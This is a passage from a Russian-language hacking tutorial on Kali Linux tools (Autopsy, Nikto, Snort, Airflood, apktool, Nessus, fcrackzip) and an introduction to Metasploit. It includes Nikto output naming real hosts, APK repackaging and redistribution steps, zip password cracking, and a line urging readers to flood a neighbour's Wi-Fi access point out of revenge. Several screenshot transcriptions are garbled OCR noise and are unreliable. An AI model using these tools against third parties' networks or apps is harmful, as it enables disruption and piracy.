- El USE Device Attached (10)	V 201 Other Add File Tag		0008-08-00 00-01-00-	ana-to-on-d-on-to	4.8
- 🦧 Web Boulanaria (12)	v 214 Online 1 Demons Lie Tan	codo no se tot-color	0000-00-00-00-00-00	1000-01-01-02-02-03	1.04.00
web Coskes (102)	to 228. Other 1 second real range	ton Death-co-do doi-to ha	0000-00-00 00-00-00	0050-00-00 00-00-00	1.0
Web Courrised's (8)	218. Celtar ( Add File to Hash Set (Ingest is running) - woh on on price	100 100-00-00 00-00-00	2010-02-02-02-02-02-	- 2005 05 (c 30-00-0	1.1
- E The Minter (20)	· No. And in Rectarizations of ETTER Brandwellings ressore	A DEPUBLIC OF UP OF	100-2-010-05-0	000000000	10.00
Web Search (1)	w 256 Debay Pertindettees \$/ \$220) Brandrates/Pathano. 010-0-010010	1000000000000000	000-0-0-0-0-0	0101010101010	11321
B 3 Keyword Hits	A NO Consistent and A NOTICE AND A NOTICE		100-01-001020520	000-00-00-00-00-0	- A - W
Single Literal Keyword Search (b)     Single Literal Keyword Search (b)	<ul> <li>Institution of the providence of th</li></ul>	STATUS STATUS			
B S Ernal Addresses (0)	in the second Phytometric and the band the first the second	4-			100
Se Halfnet Hts E E Half Hessages	Name /mg_PhysicalDriveGivol_volSProgramData/Microsoft/Provisioning/(cl	3a326e4-f518-4f14-b543-97	a57e1a975e)/ProviRun	Time/106_Connectio	ms provx A
- III: Diteresting Items	Type File System NIME		1.1.		
E BI Tep	Туре	1. 4 2 1 -			
. W where	5/20 0				
	Fig.				- C
1	Alexandra (		and the second		
and the second second second		a contra to a contra de la contra de	and the supervised have		2
		Housed Activity for Phys		1.11	Marca 169.2

Рис. 6.53. Удаленные файлы

Как показано, файл, хотя и удален, мы все еще можем просмотреть его содержимое. Для восстановления файла (-ов) выдели его, щелкни правой кнопкой мыши и выбери команду **Extract File (s)**.

The surger stars with substance The canonication A o	entication	and Depress Ib	Generale Report	Close Case 2		10 1 1 1 <b>1</b>	40 - SayvordLaits	Gr Reyword Search
6	[Leting ]	000000	S		N	E Charles Wash	a state of the second	Carriel a soft
a di Dete facesse	1350 Device Attached							35 Result
D III Vens	Table Thurshood	and a local second						
Ep 18 He Types								Baver Yabler an CDV
E S By Dittrision	Source Hie		c 0	Date/Two	Device Make	Delike Model	Device ID	Data Severce
(a) of the Mont Type	EN SYSTEM		1	1010-12-05 14 ST 37 HER		8.001 (4.6	WOLTNEY LENGT	Propint
The Custom (0072)	\$2 STSTEN		1	2020-12-03 (4.98. 57 (402		1001 (4.620	CALCULATION AND	Humpfingt
W AI 94220	ER SUSTEM	Contractor and the	14	\$105-12-05 (4.78.57.185c		ROOT NUES	Excluded Section	HunnaColori,
2 MB file Str	ER EVETEM			\$100-17-00-1e-05-17-984	Warmer Inc.	Same and the state	ALCOLDENCE (MT	Harris Print
(fil) Results	ER SYSTEM		-	pronation being when	Whene Dr.	vinual (27) Hud	#0.701117#16/969	Brothattan
Extracted Content	Sin DATTEN		1000	TOST NAME AND TRANS	Where he	THE OF LAND	washing - laber	Music all a times
CO Material (1417)	ES CUTTEN		1000	1000 Lb 08 La St. Stark	televine for	Make of Manage	18.7+0+01+8-04-000	States and states
- III Operating Trysen Information (2)	ER CHCTER			SURFACE OF STREET	Webcome hir -	The of hearts	Saturda Bally Bally Bally	Description
Operating System User Account (1)	AR CONTRA		C	N.A. 13 AL 14 ST 13 MEY	Underson Ser	The of Alexand	da 101 10 hora Md	Reveral Loan
- Recent Decuments (78)	All contract		1000	NAME AND ADDRESS OF ADDRESS	the second second	in the second	1000001 (0000000)	Neineller
- K Recycle Bin (12)	KS susters	1000	- · · ·	State Plate to second say	senare, rs.	sense senses :	Provident a served	me salere .
- Xi Run Programs (1276)	1							
all Build and an and a second	1							
With Boolemarks (12)	1	1. 20						
- @r Web-Cooker (302)	1							
Web Develoads (8)								1.544.51
Inth Fore Autoff (1)	1							
and freed (0)	1							
So S. Annuality	1.000							
18: 15: Single Uteral Reyword Steech (0)	And the second second		*1					
(2) Single Regular Dispression Search (2)	Over these sub-	an The based on the	mail Labora	And A Company of Street of Company	1212			
E Tual Addresses (41)	and seen a							
- R Fasherists	1 2 3 2 3							
W attended from	1.							
accasts.	States and the states of the s							
E da Teor	1							
in Leports	1.							
	1							
	A. Contractor							

Рис. 6.54. Список подключавшихся к компьютеру USB-устройств

Раздел USB Device Attached содержит список USB-устройств, которые когда-либо подключались к компу (рис. 6.54). В дальнейших главах вы узнаете, как очистить этот список. Мы исследуем тестовую систему, поэтому реальных устройств к ней не подключалось.

Раздел E-mail Adresses содержит адреса электронной почты. Они находились на страницах, которые просматривал пользователь, возможно, он с ними контактировал, возможно – нет. Для каждого найденного адреса приводится источник – файл, в котором он был найден.



Рис. 6.55. Электронные адреса

Сразу отметим, что на детальное рассмотрение всего функционала уйдет не одна глава, здесь же мы лишь прикоснулись и слегка его пощупали. Однако мы постарались емко, доступно рассмотреть некоторый функции. Далее мы переходим к рассмотрению следующего полезного инструмента.

## 6.4.13. Nikto

Nikto – это мощный сканер веб-сервера, который делает его одним из лучших инструментов Kali Linux. Он проверяет потенциально опасные файлы / программы, устаревшие версии сервера и многое другое. Есть много онлайн-сканеров уязвимости, чтобы протестировать ваши вебприложения в Интернете.

Однако если нужно протестировать приложения Интранет или внутренние приложения, тогда используется веб-сканер Nikto.

Nikto – сканер с открытым исходным кодом, написанный Крисом Салло. Его можно использовать с любым веб-сервером (Apache, Nginx, IHS, OHS, Litespeed, и т.д.).

Работа Nikto включает в себя сканирование для более чем 6700 элементов для обнаружения неверной конфигурации, опасных файлов и т.д.

Некоторые функции приложения:

- Отчет в форматах HTML, XML, CSV.
- Поддержка SSL.
- Сканирование портов на сервере.
- Поиск субдоменов.
- Вывод пользователей Apache.
- Проверка на устаревшие компоненты.
- Обнаружение хостинга.

Для проверки узла используется команда:

nikto -h <IP или имя>

Рассмотрим вывод сканера, обрати внимание на строки, выделенные жирным:

	Nikto v2.1.5	
- + + + +	Target IP: Target Hostname: Target Port: Start Time:	90.156.152.133 vm658224 80 2020-12-08 18:29:01 (GMT3)
- + + +	Server: Apache/2.4 Cookie mcfront cre The anti-clickjack	.18 (Ubuntu) ated without the httponly flag ing X-Frame-Options header is not present.

```
+ No CGI Directories found (use '-C all' to force check all
possible dirs)
+ DEBUG HTTP verb may show server debugging information. See
http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.
aspx for details.
+ /config.php: PHP Config file may contain database IDs and
passwords.
+ OSVDB-561: /server-status: This reveals Apache information.
Comment out appropriate line in httpd.conf or restrict access
to allowed hosts.
+ Cookie pmaCookieVer created without the httponly flag
+ Cookie phpMyAdmin created without the httponly flag
+ Cookie pma lang created without the httponly flag
+ Cookie pma collation connection created without the httponly
flag
+ Uncommon header 'x-frame-options' found, with contents: DENY
+ Uncommon header 'content-security-policy' found, with
contents: default-src 'self' ;script-src 'self' 'unsafe-
inline' 'unsafe-eval' ;;style-src 'self' 'unsafe-inline'
; img-src 'self' data: *.tile.openstreetmap.org *.tile.
opencyclemap.org;
+ Uncommon header 'x-content-security-policy' found, with
contents: default-src 'self' ; options inline-script eval-
script; img-src 'self' data: *.tile.openstreetmap.org *.tile.
opencyclemap.org;
+ Uncommon header 'x-webkit-csp' found, with contents:
default-src 'self' ;script-src 'self' 'unsafe-inline'
'unsafe-eval'; style-src 'self' 'unsafe-inline' ; img-src 'self'
data: *.tile.openstreetmap.org *.tile.opencyclemap.org;
+ Uncommon header 'x-ob mode' found, with contents: 1
+ Server leaks inodes via ETags, header found with file /icons/
README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 17 item(s) reported on
remote host
+ End Time:
                      2020-12-08 18:29:07 (GMT3) (6 seconds)
+ 1 host(s) tested
```

- Сервер сообщает свою версию. Нужно править конфигурационный файл, чтобы такого не происходило.
- Файл /config.php содержит пароли для доступа к БД.
  - 172

- /server-status сообщает о статусе сервера, также нужно редактировать конфигурацию сервера.
- /phpmyadmin обратите внимание на этот каталог, очевидно, что нужно разрешить доступ к нему только доверенным узлам.

На рис. 6.56 приведен пример правильно настроенного веб-сервера, который не сообщает ничего лишнего (ну практически ничего – только свою версию).

2		-		×
<pre>+ Uncommon header 'x ne-script eval-scrip + Uncommon header 'x e-inline' 'unsafe-ev .org *.tile.opencycl. + Uncommon header 'x + Server leaks inode a + OSVDB-3233: /icons + /phpmyadmin/: phpM + 6544 items checked + End Time:</pre>	<pre>-content-security-policy' found, with contents: default-src 'sel ;;mg.src 'self' data: *.tile.openstreetmap.org *.tile.opensyc1 webkit-csp' found, with contents: default-src 'self' ;script-sr anp.org; -ob_mode' found, with contents: 1 s via ETags, header found with file /icons/REAOME, fields: 0x134 /README: Apache default file found. /Admin directory found : 0 error(s) and 17 item(s) reported on remote host 2020-12-08 18:29:07 (GMT3) (6 seconds)</pre>	lf' ;opt lemap.or rc 'self ile.open f4 0x438	ions i g; ' 'ur street c03496	inli^ isaf cmap 58a8
+ 1 host(s) tested root@vm658224:~# root@vm658224:~# mc root@vm658224:~# root@vm658224:~# nik - Nikto v2.1.5				
+ Target IP: + Target Hostname: + Target Port: + Start Time:	185.114.245.107 linuxcenter.ru 80 2020-12-08 18:36:51 (GMT3)			
+ Server: nginx/1.16 + The anti-clickjack + Root page / redire + No CGI Directories + 6544 items checked + End Time:	1 ing X-Frame-Options header is not present. cts to: https://linuxcenter.ru/ found (use '-C all' to force check all possible dirs) : 0 error(s) and 1 item(s) reported on remote host 2020-12-08 18:38:25 (GMT3) (94 seconds)			
+ 1 host(s) tested root@vm658224:~#				~

Рис. 6.56. Сканирование другого узла с правильной настройкой веб-сервера

У Nikto много разных опций. Мы использовали опцию –h, задающую имя или IP-адрес узла. Также тебе может пригодиться опция –port, позволяющая указать номер порта (по умолчанию 80).

Описание всех опций Nikto ты найдешь по адресу: https://kali.tools/?p=2295

#### 6.4.14. Snort

Ранее уже упоминался инструмент Wireshark.

Утилита **Snort** позволяет произвести анализ трафика в реальном времени с возможностью регистрации пакетов. Но Snort – это нечто большее, чем просто утилита для захвата трафика. Это система предотвращения вторжений – IDS.

Правильная установка и настройка Snort – непростой процесс, выходящий за рамки этой книги. Однако, если ты хочешь защитить свой сервер от своих же коллег, тебе стоит рассмотреть использование Snort:

https://bit.ly/2JMyKpx

# 6.4.15. Airflood

Хочешь отомстить соседу? Попробуй заDOSить его точку доступа. Данная программа заполняет таблицу клиентов точки доступа случайными МАС, делая подключения невозможными.

В последних версиях Kali Linux почему-то эта программа не устанавливается. Но ее исходники все еще доступны по адресу:

https://packetstormsecurity.com/files/51127/airflood.1.tar.gz.html

# 6.4.16. Apktool

**Аркtool** действительно является одним из популярных инструментов Kali Linux для реверс-инжиниринга приложений для Android.

Инструмент очень популярен у хакеров, поскольку он позволяет разобрать APK-файл... и собрать его заново. Пока APK в разобранном состоянии, хакер может модифицировать его, как ему только захочется.

Программа **apktool** не устанавливается по умолчанию, поэтому для ее установки нужно ввести команду:

sudo apt install apktool

Рассмотрим небольшой пример использования программы. Распакуем APKфайл firewall.apk:

apktool decode firewall.apk



Рис. 6.57. Программа apktool в действии

Программа разберет по полочкам твой АРК и положит его содержимое в каталог с таким же названием, как у АРК-файла. В нашем случае нужно перейти в каталог firewall, и ты увидишь содержимое твоего АРК-файла (рис. 6.58). Именно так и создаются взломанные версии АРК (которые ты можешь скачать, например, на 4pda.ru.), АРК разворачивается, изменяется и упаковывается обратно.

💐 📄 🔤 🗐 👘 👘 🖉 👘	[root@kali]:-/firewa		07:07 11 (PM) 🗗 🕧 🏚 🕒 🖨 😁
			– <b>D</b> ×
Файл Действия Правка Вид Справка			
- Hittan nament - Gann - Adomondar (* 19 19 - Afflowall -	астройки Правал панель 1 13 р.	-/firewall/res/drawable-hdpi-v4	
/	BREPX dam 8 10:04 4000 park 6 10:256 4066 park 6 10:256 4066 park 8 10:04 4066 park 8 10:04 4006 park 8 10:04 4006 park 8 10:04 4006 park 8 10:04		- 2659X   nox   0 101 GU
antoolyn)			
oberny Deer Rononsymte Maa within John Boctstra	9 ізбилано, сарку 4. остория команд.	ent or-	71884/19F (LW)
100ного 22но стали образнотр.		tenenote	PLANKE ILEBITOR

Рис. 6.58. Содержимое АРК-файла

После этого у тебя есть возможность изменить любой файл, например ресурс (картинку), который хранится в каталоге res. Использование **apktool** в самых мирных целях подразумевает возможность установки двух одинаковых приложений на один телефон. Для этого откройте файл AndroidManifest. xml и измени название пакета:



Puc. 6.59. Изменение AndroidManifest.xml

Тебе нужно ввести просто другое название пакета, пусть новая программа называется так же, как и старая, просто добавь какой-то префикс или постфикс к ней вроде program2.

После этого ты можешь собрать заново АРК-файл. При сборке нужно подписать его тем же сертификатом, что и оригинал, иначе ничего не выйдет.

Соберем АРК-файл:

apktool build firewall firewall2.apk

Здесь firewall2.apk – так будет называться наша версия АРК-файла. Осталось только подписать файл. Это можно сделать с помощью программы SmartAPKTools, скачать которую можно по адресу:

#### http://kodopik.ru/SmartAPKTool.zip

В приложении все понятно и просто. После подписания ты можешь выложить приложение на каком-то сайте, чтобы его смогли загрузить пользователи.

## 6.4.17. Nessus – лучший сканер уязвимостей

Если есть желание найти уязвимости компьютера, подключенного к сети (речь не о сети питания, надеемся, ты догадался!), используй Nessus.

Как правило, тест на проникновение начинается со сканирования на уязвимости. Хороший сканер содержит в себе всегда актуальную базу известных уязвимостей и, сканируя сеть, сообщает о наличии той или иной.

Задача хакера заключается в том, чтобы вычислить как можно больше уязвимостей. Нужно отметить, что сканеры часто заявляют о ложных срабатываниях, поэтому тебе удастся использовать не все найденные уязвимости.

Одним из наиболее популярных сканеров уязвимостей на рынке является **Nessus Vulnerability Scanner**. Он стал своего рода стандартом для сканеров уязвимостей. Изначально это был проект с открытым исходным кодом.

Далее его приобрела компания Tenable, и теперь он является коммерческим продуктом (версия Professional). Несмотря на это, у Nessus Scanner по-прежнему есть Essential-версия (ранее она называлась Home), которая распространяется бесплатно, но имеет ограничение в 16 IP-адресов. Именно эту версию мы и будем рассматривать далее.

Нужно понимать, что ни один сканер не позволяет обнаружить уязвимости нулевого дня (0-day), то есть те уязвимости, которые кем-то обнаружены именно сегодня. Это связано с тем, что сканеры должны очень оперативно обновляться, что по понятным причинам невозможно. Допустим, некто Пупкин нашел уязвимость в той или иной программе. Если он никак не связан с разработчиками сканера, то вероятность того, что найденная им уязвимость появится в базе данных сканера, равна 0. Вот когда этот Пупкин взломает несколько систем, используя найденную уязвимость, вот тогда она только появится в базе – когда общественность о ней узнает.

С недавнего времени даже правительство США начало использовать Nessus для сканирования уязвимостей. Почти каждый федеральный офис и военная база США во всем мире теперь применяет Nessus.

Разработчики Nessus сделали все, чтобы усложнить поиск ссылки на скачивание Essential-версии. Поэтому предоставляем тебе прямую ссылку:

https://www.tenable.com/products/nessus/nessus-essentials

## 6.4.18. fcrackzip – взлом пароля Zip-архива

Данный инструмент позволяет взломать запароленный Zip-архив.

Вместо тысячи слов лучше посмотрим на этот инструмент в действии. Запакуй какие-то файлы, при создании архива установи любой пароль. Затем "скормим" этот архив инструменту fcrackzip. Создать архив с паролем можно, используя стандартный файловый менеджер. Выбери тип архива zip и установи пароль для него, как показано на рис. 6.60.



Рис. 6.60. Создание архива с паролем

По умолчанию данная программа не установлена, поэтому для ее установки нужно ввести команду:

sudo apt install fcrackzip

После этого запусти программу так:

fcrackzip firewall.zip

Программа начнет перебор возможных комбинаций паролей, и придется немного подождать (при этом программа ничего не выводит на экран, но не нужно думать, что она ничего не делает или зависла). Время ожидания зависит от сложности пароля, но, учитывая, что архив – это файл, а не сетевой сервис, и количество неверных попыток никак не ограничивается, то можно с уверенностью сказать, что рано или поздно программа таки подберет пароль.

Программа сообщит найденный пароль так:

possible pw found: aa/mc?

*аа/mc?* – это и есть пароль, указанный при создании архива.

Описание остальных инструментов ты найдешь на сайте *https://kali.tools*. В следующей главе мы рассмотрим популярный фреймворк поиска уязвимостей Metasploit, который является частью Kali Linux. По сути, глава 7 будет продолжением этой главы.


## Глава 7.

## Секреты Metasploit

## 7.1. Что такое Metasploit

Собственное, что он собой представляет и почему ему посвящена целая глава. Начнем с самого начала. В далеком 2003 году хакеру HD Moore (это его ник) пришла в голову идея разработать инструмент для быстрого написания и использования эксплойтов. Так на свет появился известный во всех кругах (как в кругах хакеров, так и специалистов по IT-безопасности) проект Metasploit project.

Первая версия фреймворка была написана на языке Perl, содержавшая псевдографический интерфейс на базе библиотеки curses. На тот момент это был просто набор разрозненных эксплойтов и скриптов, общие сведения о которых хранились в единой базе данных. Информация о необходимом окружении для запуска скриптов, как правило, отсутствовала. Также они несли в себе кучу устаревшего кода, требовали модификации жестко прописанных путей для каждого конкретного случая, что весьма затрудняло рабочий процесс и усложняло разработку новых инструментов.

В общем, первая версия фреймворка была как тот первый блин, который всегда комом. Но ничего страшного, зато к HD Moore присоединились другие добровольцы, которым понравилась сама идея, в том числе Мэтт Миллер. Во второй версии был наведен хоть какой-то порядок в самой базе данных Metasploit.

Третья версия была полностью переписана на Ruby, ее разрабатывала компания Metasploit LLC (основанная все теми же разработчиками в 2006 году). В 2008 году лицензия Metasploit Framework была сменена с пропристарной на BSD. А еще позднее, в 2009 году, фирма Rapid7, занимающаяся управлением уязвимостями, объявила о приобретении Metasploit, программного пакета двойного назначения для проведения тестов на проникновение. Так же сообщалось, что некоммерческая версия утилиты по-прежнему будет доступна для всех желающих. С момента приобретения фреймворка многое изменилось. Появились PROи Community-версии, а в 2010 году, в свет вышла более упрощенная версия для "малоквалифицированных" пользователей — Metasploit Express.

На данный момент фреймворк распространяется в четырех версиях:

- 1. Framework базовая версия с консольным интерфейсом;
- 2. Community бесплатная версия, включающая дополнительно вебинтерфейс и часть функционала из коммерческих версий;
- 3. Express для коммерческих пользователей, включает функционал, позволяющий упростить проведение базовых аудитов и формирование отчетности по ним;
- Pro самая продвинутая версия, предоставляет расширенные возможности для проведения атак, позволяет формировать цепочки задач для аудита, составлять подробную отчетность и многое другое.

Помимо веб-интерфейса, доступного в версиях Community, Express и Pro, существуют такие проекты, как Armitage (http://www.fastandeasyhacking. com/) и Cobalt strike (https://www.cobaltstrike.com/), предоставляющие дружелюбный и интуитивно понятный GUI-интерфейс для фреймворка. Первый так и называется – Cyber Attack Management for Metasploit – управление кибератакой для Metasploit.

По сравнению с остальными интерфейсами Armitage позволяет в наглядном виде представить все этапы атаки, включая сканирование узлов сети, анализ защищенности обнаруженных ресурсов, выполнение эксплойтов и получение полного контроля над уязвимой системой.

Все функции программы структурированы и легкодоступны из меню и вкладок программы, даже для начинающего исследователя компьютерной безопасности. Программа предназначена для использования на платформах Linux и Windows. На веб-сайте разработчиков (http://www.fastandeasy-hacking.com/manual) присутствуют исходные коды, справочные руководства в текстовом и видеоформате.

Об интерфейсе Cobalt можно сказать, что он слишком дорогой. В текущем моменте годовая лицензия стоила 3500\$ на одного пользователя, а продление лицензии – 2500\$. Такой инструмент могут позволить себе разве что профи высокого класса, ведь нужно не только его купить, но и сделать так, чтобы он приносил деньги. А учитывая, что это всего лишь оболочка, а не

-----

сам фреймворк, понятно, что очередь за ним не стоит, особенно на наших просторах.

## 7.2. Структура фреймворка

"Сердце" Metasploit — библиотека **Rex**. Она требуется для операций общего назначения: работы с сокетами, протоколами, форматирования текста, работы с кодировками и подобных.

На ней базируется библиотека MSF Core, которая предоставляет базовый функционал и "низкоуровневый" API. Его использует библиотека MSF Base, которая, в свою очередь, предоставляет API для плагинов, интерфейса пользователя (как консольного, так и графического), а также подключаемых модулей.

Все модули делятся на несколько типов, в зависимости от предоставляемой функциональности:

- Exploit код, эксплуатирующий определенную уязвимость на целевой системе (например, переполнение стека).
- **Payload** код, который запускается на целевой системе после того, как отработал эксплойт (устанавливает соединение, выполняет шелл-скрипт и прочее).
- **Post** код, который запускается на системе после успешного проникновения (например, собирает пароли, скачивает файлы).
- Encoder инструменты для обфускации (запутывания кода) модулей с целью маскировки от антивирусов.
- NOP генераторы NOP'ов. Это ассемблерная инструкция, которая не производит никаких действий. Используется, чтобы заполнять пустоту в исполняемых файлах, для подгонки под необходимый размер.
- Auxiliary модули для сканирования сети, анализа трафика и так далее.

До начала работы с пакетом нужно учесть возможность использования базы данных, для хранения информации о хостах, сервисах, уязвимостях и прочем. Подключение к базе весьма не обязательное условие для функционирования фреймворка, но, тем не менее, повышающее удобство использования производительность.

Metasploit использует PostgreSQL, поэтому до начала работы с ним понадобится установить СУБД на свою систему. Затем убедиться, что запущены нужные сервисы БД и фреймворка. Далее мы покажем, как подготовить базу данных для Metasploit.



Puc. 7.1. Структура Metasploit

#### 7.3. Базовая терминология

Прежде чем мы начнем изучение фреймворка, нужно разобраться с терминологией, чтобы мы говорили на одном языке.

Эксплойт (англ. exploit — использовать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода, который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведет к повышению привилегий или отказу в обслуживании компьютерной системы. Грубо говоря, это такой кусок кода, содержащий ошибку, которая приводит к уязвимости (см. далее) в системе. Шелл-код, код оболочки, шелл-код (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/ sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows.

Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая хакеру доступ к командной оболочке (англ. shell) в компьютерной системе.

Реверс-шелл – при эксплуатации удаленной уязвимости шелл-код может открывать заранее заданный порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (*англ. port binding shellcode*).

Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).

Уязвимость – в компьютерной безопасности, термин уязвимость (*англ.* vulnerability) используется для обозначения слабо защищенного или открытого места в системе.

Уязвимость может быть результатом ошибок программирования или недостатков в дизайне системы. Уязвимость может существовать либо только теоретически, либо иметь известный эксплойт. Уязвимости часто являются результатом беззаботности программиста, но, также, могут иметь и другие причины. Уязвимость обычно позволяет атакующему обмануть приложение, например, с помощью внедрения данных каким-нибудь незапланированным способом выполнения команды в системе, в которой выполняется приложение, или путем использования упущения, которое позволяет получить непредусмотренный доступ к памяти для выполнения кода на уровне привилегий программы. Некоторые уязвимости появляются из-за недостаточной проверки данных, вводимых пользователем; часто это позволяет напрямую выполнить команды SQL (SQL-инъекция). Другие уязвимости появляются из-за более сложных проблем, таких как запись данных в буфер без проверки его границ, в результате буфер может быть переполнен, что может привести к исполнению произвольного кода. Еще одно понятие, с которым нам предстоит разобраться, – полезная нагрузка – рауload.

Если вы начнете изучать зарубежные руководства по хакингу (а рано или поздно это произойдет), то все они пестрят одним термином – payload. Как его понимать? Буквально он переводится как "полезная нагрузка". Под этим словом подразумевают код или часть кода вредоносной программы (червей, вирусов), который непосредственно выполняет деструктивное действие: удаляет данные, отправляет спам, шифрует данные, открывает подключение для хакера и т.д. Вредоносные программы также имеют overhead code (буквально "служебный код"), под которым понимается та часть кода, которая отвечает за доставку на атакуемую машину, самостоятельное распространение вредоносной программы или препятствует ее обнаружению.

Другими словами, так называемая "полезная" нагрузка для жертвы оказывается совсем не полезной. А вот для хакера *payload* является ключевым элементом, который необходимо доставить на компьютер цели и выполнить. Код полезной нагрузки может быть написан самостоятельно (и это правильный подход, позволяющий значительно снизить шансы обнаружения антивирусами – в этом ты быстро убедишься сам, если будешь пробовать запускать исполнимые файлы с полезной нагрузкой в системах с установленным антивирусом), а можно воспользоваться разнообразными генераторами полезной нагрузки. Суть работы этих программ заключается в том, что хакер выбирает типичную задачу (например, инициализацию оболочки для ввода команд с обратным подключением), а генератор выдает тебе исполнимый код под выбранную платформу. Если у тебя нет навыков в программировании, то это единственный возможный вариант.

Одним из самых популярных генераторов полезной нагрузки является MSFvenom. Это самостоятельная часть Metasploit, предназначенная для генерации полезной нагрузки.

## 7.4. Конфигурации фреймворка и основные команды

Существует три конфигурации фреймворка – командная строка (она называется msfconsole), веб-интерфейс (Metasploit Community, PRO и Express), графическая оболочка (Armitage, Cobalt strike).

Учитывая, что мы только учимся, мы не будем покупать платные версии. По сути, можно все сделать в той же msfconsole и при этом на данном этапе ничего никому не платить.

Несмотря на наличие графических интерфейсов, самым распространенным способом работы с Metasploit по-прежнему остается консольный интерфейс msfconsole. Основные команды консоли приведены в таблице 7.1.

Таблица	<i>7.1</i> .	Основные	команды	msfconsole

Команда	Описание
use	Используется для выбора определенного модуля для работы с ним
back	Операция, обратная use, то есть перестать работать с выбранным модулем и вернуться назад
show	Показать список модулей определенного типа
set	Установить значение определенному объекту
run	Запустить вспомогательный модуль
info	Вывести информацию о модуле
search	Найти определенный модуль
check	Проверить целевую систему, подвержена ли она уязвимостям
sessions	Показать список доступных сессий

## 7.5. Конфигурация модулей

У каждого модуля есть свой собственный набор опций, которые хакер может настроить под свои потребности. Существует очень много опций, поэтому перечислить здесь все невозможно. Тем не менее, ниже представлены несколько вариантов, которые обычно используются для настройки модулей:

• Тип пейлоуда – определяет тип полезной нагрузки, который эксплойт будет доставлять к цели. Доступны следующие типы:

- » Command пейлоуд, который выполняет команду. С его помощью можно выполнять команды на удаленном компьютере.
- » Meterpreter прогрессивный пейлоуд, который предоставляет командную строку, с помощью которой можно доставлять команды и применять расширения.
- Тип соединения определяет, как Metasploit будет подключаться к цели. Возможны варианты:
  - » Автоматический при автоматическом соединении используется связанное соединение, если был обнаружен NAT; в противном случае, используется обратная связь.
  - » Связанный используется связанное соединение, что особенно важно, если цель находится не в зоне брандмауэра или NAT-шлюза.
  - » Обратный использует обратную связь, что особенно важно, если система не может инициировать соединение с целями.
  - » LHOST определяет адрес локального хоста.
  - » LPORT определяет порты, которые нужно использовать для обратных связей.
  - » RHOST определяет адрес цели.
  - » RPORT определяет удаленный порт, который нужно атаковать.
- Настройки цели указывает целевую операционную систему и версию.
- Перерыв эксплойта определяет время ожидания в течение нескольких минут.

## 7.6. Первый запуск Metasploit

Открой меню приложений и введи Metasploit. Далее появится команда запуска фреймворка.

Да, Metasploit по умолчанию установлен в Kali Linux и тебе не нужно предпринимать никаких действий по его установке.





Рис. 7.2. Как запустить консоль Metasploit в Kali Linux

При первом запуске будет проинициализирована база данных фреймворка (рис. 7.3). Файл конфигурации базы данных находится в /usr/share/metasploit-framework/config/database.yml. На рис. 7.4 видно приглашение msf6 – консоль готова ко вводу команд.



Рис. 7.3. Инициализация базы данных

Фреймворк содержит полезную команду *db\_nmap*, которая не только запускает сканирование с помощью **nmap**, но и сохраняет результаты сканирования в базу данных фреймворка:



Discovered Pi Dain Devictors Repairs But Cropsess The have kept /usr/bin/sythom pointing to Pythom 2 for backwards computability. team how to change this and avoid this servage: intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/sphere/interpret/ intro://www.kail.org/outs/ intro://www.kail.org/outs/ intro://www.kail.org/outs/ intro://www.kail.org/outs/ intro://www.kail.org/outs/ intro://www.composition/ intro://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww	1       -   -     -   -   -   -   -   -	r [root@kati]./ root@kati: ~
Date         Description         Description           We have kept /usr/bin/python pointing to Python 2 for Datkwards computability. Learn how to change this and avoid this message: intrps://www.shall.org/outcol/general-usrop/python/tytoritin// intrps://www.shall.org/outcol/general-usrop/ intrps://www.shall.org/outcol/general-usrop/ intrps://www.shall.org/outcol/general-usrop/ intrps://www.shall.org/outcol/general-usrop/ intrps://www.shall.org/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/outcol/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://www.shallorg/general-usrop/ intrps://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww		
Ne have kept /usr/bin/eythen pointing to Python 2 for backwards computability, isam now to change this and avoir this excage inttp://www.kalu.org/doc/Special-usr/eythen/listalian/ P. Creating configuration file "Joint Share/setaploit frampontk/config/database.yet () Creating initial database scheme	Файл Действия Правка Вид Справка	
In a "couch ~/ Euroliceth" to hise this restand?     Couch of the function of the functio	We have kept /usr/bin/python pointing to compatibility, Learn How to change this 	
INon SuperMack II Logon         User Hame?       1         Personal       1         Personal       1         Iter to the second	(Run "touch -/.husHlogin" to hide this m •] Creating configuration file /usr/Shar [+] Creating initial database schema	
User times: [ - 1 Possword; [ - ] L OK J 	2Kom SuperHack	: II Logon
Fussmerds     I     I       I ok J		
L ok ] 		
